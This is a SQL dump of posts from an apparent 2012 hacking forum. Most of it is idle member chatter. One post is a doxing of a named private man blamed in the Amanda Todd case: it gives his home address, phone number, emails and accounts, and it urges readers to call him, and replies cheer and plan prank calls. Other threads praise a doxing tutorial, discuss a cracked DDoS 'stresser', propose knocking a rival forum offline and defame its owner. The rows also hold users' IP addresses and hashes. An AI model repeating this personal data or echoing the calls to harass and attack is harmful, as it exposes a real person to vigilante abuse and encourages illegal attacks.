'1223104677', '1', '0', '0', '0', '1', '4cf745baeb3bf24d2d3927879196c49b', '0', '0'); INSERT INTO mybb_posts VALUES('4952', '903', '0', '50', 'Report against a thread', '0', '5', 'Timmy', '1350432711', 'http://l33thacking.net/thread-839-post-4951.html#pid4951\r\n\r\nThat threads title is too big and people can\'t post because of that.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '755424dff005536c1fe7c58cd53dc9b9', '0', '0'); INSERT INTO mybb_posts VALUES('4953', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '5', 'Timmy', '1350432864', 'Yeah me too I think this should be closed now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ed296e33f825f49915d936de37dbde71', '0', '0'); INSERT INTO mybb_posts VALUES('4954', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '259', 'MeowMeow', '1350432908', 'You guys are thinking that NASA is some OMG site. Not really it\'s really not that good in any security at all. No new thing.', '65.49.2.14', '1093730830', '0', '0', '0', '0', '1', '33c64c83b3cb58c93a6e5cdef16fce0c', '0', '0'); INSERT INTO mybb_posts VALUES('4955', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '5', 'Timmy', '1350432963', 'Whatever sounds good is my choice in rap.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd2565abe56e02cda86b3ae3e8b887ac5', '0', '0'); INSERT INTO mybb_posts VALUES('4956', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '5', 'Timmy', '1350433031', 'Why is the biggest computing company so vulnerable to hacks and cracks?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '550932fb49ea64f7205b00468b6bbc21', '0', '0'); INSERT INTO mybb_posts VALUES('4957', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '3', '??????????¢™', '1350433191', 'Hello Drea, Welcome to LH. We hope you enjoy your stay in our warm, cozy home.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '6eb1543d42f8bacec8a3018d7bd097f0', '0', '0'); INSERT INTO mybb_posts VALUES('4958', '894', '4886', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '5', 'Timmy', '1350433231', 'What\'s the difference between a stresser and a booter?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3c147c821545131a2bd6f080a10816d6', '0', '0'); INSERT INTO mybb_posts VALUES('4959', '603', '4938', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350433289', '[quote=\'Rave™\' pid=\'4938\' dateline=\'1350427592\']\r\nWow you are LQ. Even after joker told you \r\nNO POST AND PM\r\nYou did post and PM. \r\nVery LQ and I hope you lose your mod.\r\n[/quote]\r\n\r\nActually joker gave me the choice of posting the link in the post or telling them that I will PM them. So how is it LQ? Dont talk shit if you dont know what you are talking about.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '72a7046b3766c936463a6d48128c8016', '0', '0'); INSERT INTO mybb_posts VALUES('4960', '775', '3997', '75', 'RE: GTA San Andreas Cheats', '0', '9', 'p420', '1350433388', 'Nice list, surviving without cheats in GTA SA is impossible.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ac825104cdf98f424f93996669b86fe1', '0', '0'); INSERT INTO mybb_posts VALUES('4961', '603', '3320', '47', 'RE: Custom Pastebin Source Code', '0', '1', 't3h jok3r', '1350433502', '[quote=\'Rave™\' pid=\'3320\' dateline=\'1349347214\']\r\nCould I have this? Thanks. AND STOP WITH THE FUCKING POST AND PM\r\n[/quote]\r\n\r\nPost here and PM me is not allowed [b]but[/b] post here and [b][u]I[/b][/u] PM you is allowed. I can\'t really force all content to be public because we have a lot of leechers from anarchy and we need more posts at the moment.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '63f16763d6e5b6bb9dc0ae73e07dce9f', '0', '0'); INSERT INTO mybb_posts VALUES('4962', '894', '4958', '21', 'RE: [FREE] Anonymous Stresser [Cracked]', '0', '100', '??zg???g????61', '1350433519', '[quote=\'Timmy\' pid=\'4958\' dateline=\'1350433231\']\r\nWhat\'s the difference between a stresser and a booter?\r\n[/quote]\r\n\r\nThe names ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'e6b6d56bb95d39329238a925b9c84d06', '0', '0'); INSERT INTO mybb_posts VALUES('4963', '874', '4954', '7', 'RE: N.A.S.A HACKED', '0', '3', '??????????¢™', '1350433537', '[quote=\'MeowMeow\' pid=\'4954\' dateline=\'1350432908\']\r\nYou guys are thinking that NASA is some OMG site. Not really it\'s really not that good in any security at all. No new thing.\r\n[/quote]\r\n\r\nLMAO no we arent, Its because it is a government site we arent thinking its a OMG site.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '34049c1f6dd0d54a1a2762f9787f8350', '0', '0'); INSERT INTO mybb_posts VALUES('4964', '603', '4961', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350433731', '[quote=\'t3h jok3r\' pid=\'4961\' dateline=\'1350433502\']\r\n[quote=\'Rave™\' pid=\'3320\' dateline=\'1349347214\']\r\nCould I have this? Thanks. AND STOP WITH THE FUCKING POST AND PM\r\n[/quote]\r\n\r\nPost here and PM me is not allowed [b]but[/b] post here and [b][u]I[/b][/u] PM you is allowed. I can\'t really force all content to be public because we have a lot of leechers from [A. Forums] and we need more posts at the moment.\r\n[/quote]\r\n\r\nSee Rave I told you that he told me this is allowed.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '773f30f7a47bd2cd24f8779ec44aeea0', '0', '0'); INSERT INTO mybb_posts VALUES('4965', '904', '0', '7', 'New Official L33THacking Skype Group Chat', '0', '3', '??????????¢™', '1350434160', '[b]Hello guys, i have started a new skype group chat since the others kinda failed. I will moderate it like I moderate L33THacking.[/b]\r\n\r\n[b][align=center][size=large]NO CHILDISH THINGS\r\nNO PORN UNLESS YOU WARN OTHERS\r\nNO VIRUS LINKS[/size][/align][/b]\r\n\r\n[b]If you would like to join this skype group just post your skyoe below and I will send you a request and add you.[/b]', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'cf90d3641a874fc9786a366d4f6bccac', '0', '0'); INSERT INTO mybb_posts VALUES('4966', '905', '0', '42', 'Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '8', 'spacefish36', '1350435281', '[img]http://3.bp.blogspot.com/-EOR28hNrKs0/UH3HeMFgx_I/AAAAAAAAJ_o/u_SqgT7j-BI/s640/Amanda+Todd.jpg[/img]\r\n\r\nHacker group Anonymous may have tracked down the sex-obsessed cyberbully who drove a 15-year-old girl to kill herself last week. Today Anonymous posted a video on YouTube naming a 30-year-old man from British Columbia, as the person responsible for the October 10th suicide of 15-year-old Amanda Todd. Anonymous has started #OpRIP to hunt down those who bullied Todd.\r\n\r\n[b]\"This is the pedophile that social engineered Amanda Todd into supplying him nude pictures,[/b]\" Anonymous said in a Pastebin post before identifying a 30-year-old man living in New Westminster, B.C.\r\n\r\nTodd committed suicide after years of online abuse by a man who blackmailed her, posted her topless photo online and sent it to her peers. In Todd\'s video, on handwritten note cards, she detailed the story of a man she said threatened to send photos of her breasts to friends and relatives unless she put on a sexual show for him. She apparently refused and he later made good on that promise, police told her.\r\n\r\n[b]Identity:[/b] Kody Maxson Online\r\n[b]Username:[/b] kody1206\r\n[b]Location:[/b] Sapper St, New westminster,BC\r\n[b]Birthdate[/b] 1980, age 30\r\n\r\n\r\n- See more at: http://thehackernews.com/2012/10/anonymous-identified-cyber-stalker-who.html#sthash.f1RIT98o.dpuf', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e7fc353e384ae6357252a2ddad50fde0', '0', '0'); INSERT INTO mybb_posts VALUES('4967', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350435352', 'Never really noticed you before. Sorry..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3eebe1896ad8a7302e5dfd629ed498f', '0', '0'); INSERT INTO mybb_posts VALUES('4968', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '82', 'iTzIpod', '1350435387', 'Agreed with Virtual\n\nKeep it up! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cd67d5188b9acecd7da9445e3668caa5', '0', '0'); INSERT INTO mybb_posts VALUES('4969', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '82', 'iTzIpod', '1350435441', 'Any sample templates of the requests?\n\nType: \nSize:\nRender:\nColors:\nText:\n\n\nEtc?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89c37e13683fdba296b45433962833a6', '0', '0'); INSERT INTO mybb_posts VALUES('4970', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350435488', 'http://l33thacking.net/index.php', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f14e363aaf9ac2935fd09fe019d6f8c1', '0', '0'); INSERT INTO mybb_posts VALUES('4971', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '82', 'iTzIpod', '1350435559', 'Ooo.\n\nAdd me in\n\n\nSkype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d6ee29c773a1e9f7705f2328f8d28f5', '0', '0'); INSERT INTO mybb_posts VALUES('4972', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '61', 'NXK', '1350435618', 'Way to steal my idea.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a5eba7aa10a1ccd30c4ac07ac553ea81', '0', '0'); INSERT INTO mybb_posts VALUES('4973', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1350435679', 'http://nxkallday.comoj.com/', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c6fcb6886354f7fdbf0e8c022cd77827', '0', '0'); INSERT INTO mybb_posts VALUES('4974', '905', '4966', '42', 'RE: Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '82', 'iTzIpod', '1350435681', 'Oh.\n\nSo this guy is a pedophile? \n\n\nAlright.\nHope he gets arrested.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6989deb3278f6dcc38cef8bcc99ed8c8', '0', '0'); INSERT INTO mybb_posts VALUES('4975', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350435893', 'http://nxkallday.comoj.com/\n\nLool NXK', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0a658db3ee97deda41d8f8c9368013df', '0', '0'); INSERT INTO mybb_posts VALUES('4978', '904', '4971', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '3', '??????????¢™', '1350438216', '[quote=\'iTzIpod\' pid=\'4971\' dateline=\'1350435559\']\r\nOoo.\r\n\r\nAdd me in\r\n\r\n\r\nSkype ID: iTzIpod\r\n[/quote]\r\nYou have been added.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'dc8d423adb679bb0eb003b8c2830dcc9', '0', '0'); INSERT INTO mybb_posts VALUES('4979', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '253', 'GlowingCapes', '1350438470', 'Welcome to LH. Enjoy your stay (I know you will :P).', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '0fd3934fe32e1e0e34c6ca5ac7d84bcd', '0', '0'); INSERT INTO mybb_posts VALUES('4980', '627', '3328', '33', 'RE: What can I do to improve this?', '0', '253', 'GlowingCapes', '1350438577', 'You need lost more action in it, fill the empty space, and maybe some more lighting effects and things. Other than that, it\'s good.\r\n\r\n[quote=\'Apathy\' pid=\'3328\' dateline=\'1349352036\']\r\nI would restart honestly. Needs to have the render blend more and this is WAYYYY to much empty space. Keep trying. :P\r\n[/quote]\r\n\r\nThis also.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '3b3da14d4ec1c1c8d7d1ece139188c55', '0', '0'); INSERT INTO mybb_posts VALUES('4981', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '253', 'GlowingCapes', '1350438661', 'Thanks! Just found out if my next gamertag name-change is available.. it is. ;)', '173.76.159.245', '-1387487243', '0', '0', '253', '1350438673', '1', '0b0fef26c6c9ca813779f33c0c4737b6', '0', '1350438673'); INSERT INTO mybb_posts VALUES('4982', '906', '0', '42', 'DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350439287', 'RIP Amanda http://l33thacking.net/forum-42.html\n\nAnonymous\' Identiy Configuration\n \nAmanda Todd\'s Punisher\n \nExtorted amanda todd for pictures. This is the pedophile that social engineered Amanda Todd into supplying him nude pictures.\n \nCOURT PAPER: https://sphotos-b.xx.fbcdn.net/hphotos-snc6/229991_502445646447057_829142775_n.jpg\n\nIdentity: Kody Maxson\nOnline Username: kody1206\n\nAge: 32 (born on 07/09/1980)\n\nAddress: 105-117 Sapper St\nTown: New Westminster, BC V3L 3Y6, Canada\nPhone Number: +1 404-426-5684 (Call using Skype and ask him why he did this)\nEmail: kody@hotmail.ca\nkody.maxson@hotmail.com\n\nGoogle Plus: https://plus.google.com/100714506300989733154/posts\n \nTwitter: https://twitter.com/kody1206\n \nGet Glue: http://getglue.com/kody1206\n \nWikiPedia: http://en.wikipedia.org/wiki/User:Kody1206\n \nDevian art: http://kody1206.deviantart.com/\n \nTumbler: http://kody1206.tumblr.com/\n \nLast FM: http://www.last.fm/user/kody1206\n \nJustin TV: http://www.justin.tv/kody1206\n \nYoutube: http://www.youtube.com/kody1206', '72.231.24.165', '1223104677', '1', '0', '1', '1350439386', '1', '3d987d6064d0a0f736eb1a0b03330846', '0', '1350439386'); INSERT INTO mybb_posts VALUES('4983', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '1', 't3h jok3r', '1350439436', 'I don\'t allow official chat groups, you do know that right? :O', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5a9180ce843a307923be77f700e8f693', '0', '0'); INSERT INTO mybb_posts VALUES('4984', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '222', 'Exposé', '1350441728', 'Lol its just a group of us chattin..it\'s nothin official. And you are apart of it :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'bbafc4db37af24617ea94ca5acff6c91', '0', '0'); INSERT INTO mybb_posts VALUES('4985', '902', '4937', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '2', 'Apathy', '1350441758', 'I would love this. Please do make it.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '056f8cc5185a26b371f85b6923824237', '0', '0'); INSERT INTO mybb_posts VALUES('4986', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '222', 'Exposé', '1350441788', 'Thanks for sharing dude... this guy is gonna get so much shit', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c24dc41d57aba698522cd7682ad5a9d7', '0', '0'); INSERT INTO mybb_posts VALUES('4987', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '2', 'Apathy', '1350441904', 'Welcome to the forums. Enjoy your stay. Try to be active and helpful. :)', '173.206.129.235', '-1378975253', '0', '0', '2', '1350441925', '1', '1357af3e91cf25cf9513a0e7d27ae3bb', '0', '1350441925'); INSERT INTO mybb_posts VALUES('4988', '50', '132', '12', 'RE: [tut]How to DOX', '0', '222', 'Exposé', '1350441982', 'Lol thanks for the quick guide. Appreciate it :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9cbc0fc4bd8fc2127e9954bb82c253fc', '0', '0'); INSERT INTO mybb_posts VALUES('4989', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '222', 'Exposé', '1350442280', 'Moderators and Admins should close this when the question is answered :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ff7ff6c5f81d9fc3fe3b1ef1d7a72e4b', '0', '0'); INSERT INTO mybb_posts VALUES('4990', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '222', 'Exposé', '1350442310', 'I like kid cudi and kayne west tbh :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '28fb38f57c176ede559f7f54d6cbd866', '0', '0'); INSERT INTO mybb_posts VALUES('4991', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '228', 'VirtualLegend', '1350442356', 'Looks Awesome to chat with the other LH Members', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0d2a765a6c856419b71fa0bbb9b156f9', '0', '0'); INSERT INTO mybb_posts VALUES('4992', '889', '4842', '3', 'RE: Vote for a new theme', '0', '2', 'Apathy', '1350442381', 'is not opening. Out of 2 and three though I like 3 better.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '341e7d3423b8aa159ad7781c31783f93', '0', '0'); INSERT INTO mybb_posts VALUES('4993', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '228', 'VirtualLegend', '1350442452', 'Lol I\'m gonna Prank Call him', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '98de42bd1e0dab883aa3eaa413482c9e', '0', '0'); INSERT INTO mybb_posts VALUES('4995', '904', '4965', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '222', 'Exposé', '1350442757', 'You should definately join the voice chat tho ....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '21bd5c9ffb275b792c0172a5862f50f9', '0', '0'); INSERT INTO mybb_posts VALUES('4996', '902', '4985', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '228', 'VirtualLegend', '1350442765', '[quote=\'Apathy\' pid=\'4985\' dateline=\'1350441758\']\r\nI would love this. Please do make it.\r\n[/quote]\r\n\r\nOkay I will prepare a good tutorial', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5f537a76c4713394bafec06a45619ad0', '0', '0'); INSERT INTO mybb_posts VALUES('4997', '904', '4983', '7', 'RE: New Official L33THacking Skype Group Chat', '0', '3', '??????????¢™', '1350443442', '[quote=\'t3h jok3r\' pid=\'4983\' dateline=\'1350439436\']\r\nI don\'t allow official chat groups, you do know that right? :O\r\n[/quote]\r\n\r\nOfficial as in the best.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3f1d5caf6213bdbade302cbfdb321e1f', '0', '0'); INSERT INTO mybb_posts VALUES('4998', '907', '0', '7', 'Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350444382', '[b]Hello guys, Check out my edit for the Ohio Bus Driver uppercutting a lady video. It may not be all that good because I am not an editor. Drop a like and a comment if you like it please. THANKS :)[/b]\r\nhttp://www.youtube.com/watch?v=xtvy_dxfl14', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '54c178ce5298ff6bdc956f9ce18c48f5', '0', '0'); INSERT INTO mybb_posts VALUES('4999', '908', '0', '54', '[17OCT]bangbros,mofos,pornpros,realitykings,vivid,naughtyamerica,brazzers and many', '0', '255', 'sbhshroy2', '1350444662', 'click here http://adf.ly/DlIaZ', '27.97.180.162', '459388066', '0', '0', '0', '0', '1', '6f2feef03ba2a4f0c944a96964ed0a53', '0', '0'); INSERT INTO mybb_posts VALUES('5000', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '222', 'Exposé', '1350446341', 'haha lmao this is hilarious...I could watch this 100 more times', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '8880ee7810671a752899caf672025921', '0', '0'); INSERT INTO mybb_posts VALUES('5001', '898', '4906', '71', 'RE: Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '222', 'Exposé', '1350446391', 'yeh I use this site alot when I want to play games', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6b0ec9e9059db4b0269af8d596895df4', '0', '0'); INSERT INTO mybb_posts VALUES('5002', '898', '4906', '71', 'RE: Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '257', 'XxTREYZxX', '1350446676', 'yeah i already knew this but thanks any way :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '42616eac4d7d8831e54e697b623ec4e7', '0', '0'); INSERT INTO mybb_posts VALUES('5003', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '257', 'XxTREYZxX', '1350446886', 'this is so funny made me lol.\nthis is one of the funniest things>', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '51a4ac4a39d506858c18f6499772fdfa', '0', '0'); INSERT INTO mybb_posts VALUES('5004', '190', '665', '56', 'RE: Copy and paste game', '0', '257', 'XxTREYZxX', '1350447135', 'what did i have copied and pasted is this ?(???)? , this is for my name ahah lol>', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'dddff8c36f3ab397df73be8c395d67aa', '0', '0'); INSERT INTO mybb_posts VALUES('5005', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350447381', 'LMAO Thanks guys, I am glad you like it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'ed78b1a9d1c0f8747598fc3f311a8e96', '0', '0'); INSERT INTO mybb_posts VALUES('5006', '43', '105', '7', 'RE: How did you find us?', '0', '205', 'mothered', '1350447455', 'I too, was recommended, and really enjoying my stay here :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b260f826e4f73d8f7ac3a603d46946ab', '0', '0'); INSERT INTO mybb_posts VALUES('5007', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '205', 'mothered', '1350447531', 'This Is simply awesome!\r\n\r\nGreat stuff :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9b27a048d7635172cc65e150def8cd11', '0', '0'); INSERT INTO mybb_posts VALUES('5008', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '257', 'XxTREYZxX', '1350447588', 'yes please i would really like one thanks so much:)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '3afe380e2fec298fa1041b0bcdfecd1f', '0', '0'); INSERT INTO mybb_posts VALUES('5009', '896', '4892', '23', 'RE: How to secure your Router', '0', '205', 'mothered', '1350447694', 'A very Informative thread Indeed.\r\n\r\nIt\'s amazing how many people utilize WEP, and also leave the default login details as Is.\r\nWell done mate, good work.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9f22a201619fd3f08cb4353fede9dec7', '0', '0'); INSERT INTO mybb_posts VALUES('5010', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '205', 'mothered', '1350447832', 'In the computational field, there\'s always vulnerabilities. \r\n\r\nYou just need to know where and how to find them.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '74edcf61c3f4429deb268ef9c56e085d', '0', '0'); INSERT INTO mybb_posts VALUES('5011', '43', '105', '7', 'RE: How did you find us?', '0', '257', 'XxTREYZxX', '1350447919', 'i was brought here by the admin from another forum which i do not go much because i love this forums its awesome:)', '203.104.11.14', '-882373874', '1', '0', '257', '1350447979', '1', 'e27dce68f2717fc8339b2cd838d7b9b5', '0', '1350447979'); INSERT INTO mybb_posts VALUES('5012', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '1', 't3h jok3r', '1350448176', 'Yo this shit live. I posted on ma Facebook.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '234b6d70c33a49e64f36dfc6a9411c5c', '0', '0'); INSERT INTO mybb_posts VALUES('5013', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '257', 'XxTREYZxX', '1350448254', 'im thinking what i should post next', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'a0a10a0dcd4915945dd0e4373907bd13', '0', '0'); INSERT INTO mybb_posts VALUES('5014', '909', '0', '19', '[Junk]Give me HF rep pl0x...', '0', '222', 'Exposé', '1350448256', 'NVMMMMMM PLEASE DELETE THIS THREAD', '74.76.76.132', '1246514308', '1', '0', '222', '1350448372', '1', '756ca00f45bcf832ed8ce4f32285ffc1', '0', '1350448372'); INSERT INTO mybb_posts VALUES('5017', '909', '5014', '19', 'RE: Give me HF rep pl0x...', '0', '1', 't3h jok3r', '1350448403', 'Ub3r just got repfucked :( stink ass HF staff go around repfucking anyone. I stopped helping their ass.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ec61b243ac421f4067a3005d76a5e035', '0', '0'); INSERT INTO mybb_posts VALUES('5015', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '1', 't3h jok3r', '1350448276', 'I would have shared this on HackForums too but unfortunately banned.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '321e84e7ec41fcbcca82156e324e62e9', '0', '0'); INSERT INTO mybb_posts VALUES('5016', '889', '4842', '3', 'RE: Vote for a new theme', '0', '1', 't3h jok3r', '1350448331', 'Can you vote for 3 in the poll?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b34a8d7e8ac75cc08520861123ebe4e5', '0', '0'); INSERT INTO mybb_posts VALUES('5018', '909', '5014', '19', 'RE: Give me HF rep pl0x...', '0', '1', 't3h jok3r', '1350448455', 'It\'s cool because you are not asking for rep on LH so it\'s allowed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4273f2b93f06216075dc11d301825f34', '0', '0'); INSERT INTO mybb_posts VALUES('5019', '909', '5014', '19', 'RE: Give me HF rep pl0x...', '0', '222', 'Exposé', '1350448546', 'Yeh I figured but you banned the word Hackf0rums so I said fuck it lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '45d811f46e97dff13045adc7b618a247', '0', '0'); INSERT INTO mybb_posts VALUES('5020', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '222', 'Exposé', '1350448600', 'You got banned on hackforums?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '441e69f55ba6c50111141439561e094b', '0', '0'); INSERT INTO mybb_posts VALUES('5021', '910', '0', '49', 'Referral Contest?', '0', '222', 'Exposé', '1350448890', 'Can we have some type of referral contest. That way we are getting new members while getting a prize for it...think this would be fun. :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '50b9ae5f6789716a736799d94a968b60', '0', '0'); INSERT INTO mybb_posts VALUES('5022', '911', '0', '7', 'Anyone have experience in wordpress?', '0', '222', 'Exposé', '1350449054', 'Basically I am launching a video site off another site I have. And the template that I am getting is wordpress. Anyone know how to set it up and add shit...I\'m a nub.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '42fa6ef6f3f969e77579b6daf76acb4c', '0', '0'); INSERT INTO mybb_posts VALUES('5023', '912', '0', '7', 'Woah Awesome. Something you should check.', '0', '5', 'Timmy', '1350449185', 'So seems like the skid Rhythm is planning an attack on L33T Hacking. Now just to let some people know anarchy forum is a site that spammed LH multiple times and DDoSed our site. As you can see in their thread (link below) that Rhythm is nothing but a skid and the proof lies in his thread. He is so-called hiring members to DDoS LH, seems like Anarchy forum has mature people which are queen and crimson as they know what they are talking about but the nigga Rhythm wolen. \n\nDo you think we should take them down too? Now I know Jok3r warned us and told us to back off Anarchy forums because they just jumping up high and blaming us for shit. They seem to have a DOX of Jok3r lol but the truth is that Jok3r stole the username from his old buddy from HF with full permission. No one on LH knows Jok3rs real online username except me and Apathy.\n\n[b]THEY LIKE ADVERTISING OUR SITE FOR FREE SO LETS HIT THEM OFFLINE ONLY IF THEY DO SOMETHING TO US.[/b]', '72.231.24.165', '1223104677', '1', '0', '5', '1350449229', '1', '3e865ef5f174d32c35cd4e33f0a98ba0', '0', '1350449229'); INSERT INTO mybb_posts VALUES('5024', '913', '0', '7', 'Anarchyforums.net - Owner is a well known scammer', '0', '5', 'Timmy', '1350449280', 'Anarchforums.net owner is a scammer and a butthurt. He likes sucking mad dicks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e33b966526cd44d0795f990df78ee2c9', '0', '0'); INSERT INTO mybb_posts VALUES('5025', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '7', 'Romdu62', '1350449326', 'Bump. Do not remove, they are defaming us and we will do the same thing.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'eb901946132a92cfbcbb1db37d2c2597', '0', '0'); INSERT INTO mybb_posts VALUES('5026', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '222', 'Exposé', '1350449326', 'Lol what did you base this assumption off of? LMAOROFLCOPTER', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7b8040a5e075ad2dfe5aaaeb7546b871', '0', '0'); INSERT INTO mybb_posts VALUES('5027', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '7', 'Romdu62', '1350449365', 'I\'m up for this. I will also retaliate if they do hopefully Jok3r has no problems.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '538cfda885980a3181cb695cc7ab1da0', '0', '0'); INSERT INTO mybb_posts VALUES('5028', '913', '5024', '7', 'RE: Anarchyforums.net - Owner is a well known scammer', '0', '3', '??????????¢™', '1350449390', 'LMAO FUCKING SCAMMER, HOW CAN A SCAMMER OWN A FORUM?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '37808832828cc04c20328d4309e6448e', '0', '0'); INSERT INTO mybb_posts VALUES('5029', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '1', 't3h jok3r', '1350449406', 'Do what you guys want to do because I have no control over my members, your life so do as you wish.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '66a70a880166c86542f6b6f00809aeb8', '0', '0'); INSERT INTO mybb_posts VALUES('5030', '912', '5023', '7', 'RE: Woah Awesome. Something you should check.', '0', '222', 'Exposé', '1350449466', 'This thread should be closed. We should not start this threads and retaliate. Jok3r should handle this with AF.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ccee7736a5edd8bef9a760e507069dc4', '0', '0'); INSERT INTO mybb_posts VALUES('5031', 